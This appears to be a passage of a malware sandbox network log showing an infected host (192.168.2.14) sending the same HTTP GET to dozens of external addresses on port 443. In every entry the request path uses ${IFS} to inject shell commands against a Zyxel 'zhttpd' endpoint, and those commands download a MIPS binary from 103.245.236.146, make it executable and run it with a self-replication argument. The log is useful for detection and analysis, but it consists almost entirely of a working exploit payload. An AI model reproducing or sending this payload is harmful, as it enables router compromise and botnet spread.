                                                        Jan 28, 2024 10:12:38.117405891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        752192.168.2.1454248102.17.51.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117480993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        753192.168.2.144320838.117.218.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117485046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        754192.168.2.143656857.239.1.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117502928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        755192.168.2.1449432134.232.100.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117546082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        756192.168.2.1453104122.72.215.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117594004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        757192.168.2.143486476.37.45.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117634058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        758192.168.2.1451234188.145.28.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117686987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        759192.168.2.14605942.248.127.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117728949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        760192.168.2.1440910212.131.112.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117768049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        761192.168.2.143367825.226.232.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117794991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        762192.168.2.144752695.54.217.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117830038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        763192.168.2.145509023.35.106.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117866993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        764192.168.2.1449564142.101.190.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117918015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        765192.168.2.144803612.145.15.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117957115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        766192.168.2.1444946158.159.46.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117983103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        767192.168.2.1441442134.160.200.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118025064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        768192.168.2.1457964120.208.211.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118072987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        769192.168.2.144309260.60.181.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118115902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        770192.168.2.1442902153.197.160.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118154049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        771192.168.2.145807413.202.237.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118186951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        772192.168.2.144115624.134.158.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118221998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        773192.168.2.1448788182.74.120.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118271112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        774192.168.2.1453558156.101.90.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118275881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        775192.168.2.1435772141.190.183.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118345976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        776192.168.2.1438940195.172.251.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118403912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        777192.168.2.1443316211.234.79.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118405104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        778192.168.2.1435420156.55.158.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118443012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        779192.168.2.1450976190.238.253.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118489981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        780192.168.2.144685213.127.191.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118520021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        781192.168.2.1433256144.241.134.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118640900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        782192.168.2.1455850101.229.194.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118678093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        783192.168.2.1452890165.8.213.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118729115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        784192.168.2.1452050150.195.93.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118741989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        785192.168.2.1457074178.37.255.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118779898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        786192.168.2.1435296121.174.235.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118819952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        787192.168.2.1452198140.18.152.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118865013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        788192.168.2.1437298134.104.39.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118891954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        789192.168.2.1457960145.101.101.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118926048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        790192.168.2.144214485.197.103.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.118968964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        791192.168.2.1458820124.49.174.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119024992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        792192.168.2.1448664133.85.20.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119055033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        793192.168.2.1435566162.19.126.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119083881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        794192.168.2.1454128192.50.76.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119127989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        795192.168.2.1454510132.151.38.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119163990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        796192.168.2.143697852.45.8.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119196892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        797192.168.2.1435780195.156.188.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119230986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        798192.168.2.1454856192.104.111.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119270086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        799192.168.2.144691618.151.180.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119303942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        800192.168.2.1445984188.234.135.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119332075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        801192.168.2.145651459.116.217.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119354963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        802192.168.2.144656272.40.145.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119385004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        803192.168.2.144339024.0.17.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119446993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        804192.168.2.145779659.46.190.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119482994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        805192.168.2.1439168136.57.142.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119507074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        806192.168.2.145223480.255.78.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119549036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        807192.168.2.14528082.4.89.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119601965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        808192.168.2.143348894.20.89.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119637966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        809192.168.2.1448524111.24.179.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119680882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        810192.168.2.145291666.30.28.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119712114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        811192.168.2.145587240.177.192.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119756937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        812192.168.2.14439628.215.11.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119805098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
